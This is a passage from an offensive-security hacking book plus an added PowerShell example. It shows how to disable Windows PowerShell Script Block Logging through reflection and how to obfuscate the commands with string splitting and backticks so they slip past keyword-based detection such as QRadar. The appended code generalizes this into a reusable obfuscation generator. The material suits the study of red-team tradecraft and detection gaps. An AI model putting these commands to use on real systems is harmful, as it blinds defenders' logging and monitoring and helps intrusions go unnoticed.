How to Hack Like a Legend by Sparc Flow
Author: Sparc Flow
Language: eng
Format: epub
Publisher: No Starch Press
Published: 2022-10-18T00:00:00+00:00
We need to disguise these terms while making sure they're still usable. NonPublic and ScriptBlockLogging are plain strings, so classic concatenation is enough: the parser joins the pieces at run time, but the text that gets logged (and that a keyword rule inspects) never contains the whole word. Let's revisit the previous commands that disable Script Block Logging. 'NonPublic,Static' becomes 'No'+'nPublic,Static' and 'EnableScriptBlockLogging' becomes 'EnableScriptBloc'+'kLogging':
PS C:\Lab> $dict = $utils.GetField('cachedGroupPolicySettings', 'No'+'nPublic,Static')
PS C:\Lab> $key = "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\PowerShell\ScriptBl"+"ockLogging"
PS C:\Lab> $dict.getValue("")[$key]['EnableScriptBloc'+'kLogging']=0
We've managed to hide two strings out of three, but what about the GetField method? You'd be surprised by the flexibility of PowerShell's syntax. A member name can be written as a double- or single-quoted string, and the call still works perfectly fine:
..."GetField"('cachedGroupPolicySettings', 'No'+'nPublic,Static')
Oh, but look at that! Now GetField is a string, so we can apply the same concatenation trick again, with parentheses around the expression so the concatenation is evaluated before the member lookup:
...("Ge"+"tField")('cachedGroupPolicySettings', 'No'+'nPublic,Static')
Now for the grand finale, the cherry on top of this obfuscation awesomeness: inside a double-quoted string, a backtick (`) placed before an ordinary character is simply dropped, so the command still executes normally. (In a single-quoted string the backtick is literal and would break the name.) The only constraint is that you shouldn't put a tick before the characters 0, a, b, f, n, r, t, or v, lest they be interpreted as the escape sequences null, alert, backspace, form feed, newline, carriage return, horizontal tab, and vertical tab, respectively; PowerShell 6 and later also treat `e (escape) and `u{...} (Unicode) as escapes. Here we add a tick mark before the letter 'i' in GetField:
...("Ge"+"tF`ield")('cachedGroupPolicySettings', 'No'+'nPublic,Static')
The escape sequences just mentioned are case-sensitive, so nothing forbids us from placing a tick mark in front of an uppercase F, for instance:
...("Ge"+"t`F`ield")('cachedGroupPolicySettings', 'No'+'nPublic,Static')
The final Script Block Logging code now looks like the following:
PS C:\Lab> $utils = [ref].Assembly.GetType('System.Management.Automation.Utils')
PS C:\Lab> $dict = $utils.("Ge"+"t`F`ield")('cachedGroupPolicySettings', 'NonP'+'ublic,Static')
PS C:\Lab> $key = "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\PowerShell\ScriptBl"+"ockLogging"
PS C:\Lab> $dict.getValue("")[$key]['EnableS'+'criptBlockLogging'] = 0
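The following is an added example, not code from the book: it generalizes the three tricks above (splitting a string, writing a member name as a string, and inserting backticks only before characters that are safe to escape) into a small helper, then checks read-only that the generated member name still resolves through reflection. It assumes Windows PowerShell 5.1, where the field is named cachedGroupPolicySettings (the name may differ in other versions), and it never writes to the cached policy; the function names Add-Ticks, ConvertTo-ObfuscatedExpression and Test-ObfuscatedGetField are this example's own.

```powershell
# Added example, not from the book. Assumes Windows PowerShell 5.1 (field name
# cachedGroupPolicySettings). Read-only: reports the cached setting, never sets it.

# Characters that must not be preceded by a backtick inside a double-quoted
# string: the escape letters (0 a b f n r t v; PowerShell 6+ adds e and u)
# and the three characters with their own meaning there (` $ ").
$script:TickUnsafe = '0abefnrtuv`$"'

# Inserts a backtick before every character that is safe to escape.
# String.IndexOf is ordinal, so uppercase letters such as F stay tick-able.
function Add-Ticks {
    param([Parameter(Mandatory)][string]$Text)
    $sb = [System.Text.StringBuilder]::new()
    foreach ($c in $Text.ToCharArray()) {
        if ($script:TickUnsafe.IndexOf($c) -lt 0) { [void]$sb.Append('`') }
        [void]$sb.Append($c)
    }
    $sb.ToString()
}

# Splits $Text into chunks and emits a concatenation of double-quoted, ticked
# pieces, for example  "`Get"+"`F`ie"+"`l`d"  for GetField.
function ConvertTo-ObfuscatedExpression {
    param(
        [Parameter(Mandatory)][string]$Text,
        [int]$ChunkSize = 3
    )
    $parts = for ($i = 0; $i -lt $Text.Length; $i += $ChunkSize) {
        $len = [Math]::Min($ChunkSize, $Text.Length - $i)
        '"' + (Add-Ticks -Text $Text.Substring($i, $len)) + '"'
    }
    $parts -join '+'
}

# Builds the book's GetField call from obfuscated pieces, evaluates it, and
# reports the currently cached Script Block Logging setting without touching it.
function Test-ObfuscatedGetField {
    $nameExpr  = ConvertTo-ObfuscatedExpression -Text 'GetField'
    $flagsExpr = ConvertTo-ObfuscatedExpression -Text 'NonPublic,Static'

    # Round-trip check: the parser must give back the exact original name.
    $roundTrip = Invoke-Expression $nameExpr
    if ($roundTrip -cne 'GetField') {
        throw "Round trip failed: $nameExpr evaluated to '$roundTrip'"
    }

    $utils = [ref].Assembly.GetType('System.Management.Automation.Utils')
    # Same shape as the book's call, with both strings produced by the helper.
    $cmd = '$utils.(' + $nameExpr + ")('cachedGroupPolicySettings', " + $flagsExpr + ')'
    $field = Invoke-Expression $cmd
    if (-not $field) {
        throw 'Field not found; this PowerShell version names it differently'
    }

    # Static field: the instance argument is ignored, as with the book's "".
    $cache = $field.GetValue($null)
    $key = 'HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\PowerShell\ScriptBlockLogging'
    $cached = $cache.ContainsKey($key)
    $value  = if ($cached) { $cache[$key]['EnableScriptBlockLogging'] } else { $null }

    [pscustomobject]@{
        ObfuscatedCommand        = $cmd
        FieldResolved            = $field.Name -ceq 'cachedGroupPolicySettings'
        PolicyCached             = $cached   # $false: PowerShell has not looked the policy up yet
        EnableScriptBlockLogging = $value
    }
}

Test-ObfuscatedGetField | Format-List
```

PolicyCached being $false matters for the book's technique: the dictionary entry only exists once PowerShell has looked the policy up, so indexing `[$key]` before that point has nothing to overwrite. Invoke-Expression is used here only to evaluate the generated text in the lab; pasting the printed ObfuscatedCommand directly into the prompt shows the same result.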
When we run these commands in our test lab, each one is still logged as expected, but all of them are categorized as Verbose rather than as a full-on Warning (Figure 8-4): PowerShell raises the level to Warning only when the script block text matches its built-in list of suspicious terms, and none of our split or ticked fragments does. The events thus drown in the midst of the thousand other meaningless Verbose messages. What's more, because the keywords never appear whole in the logged text, the obfuscation techniques we've applied will likely bypass any keyword monitoring performed by QRadar.
Figure 8-4: The obfuscation techniques bypass keyword monitoring, and our attack blends into the sea of Verbose logs.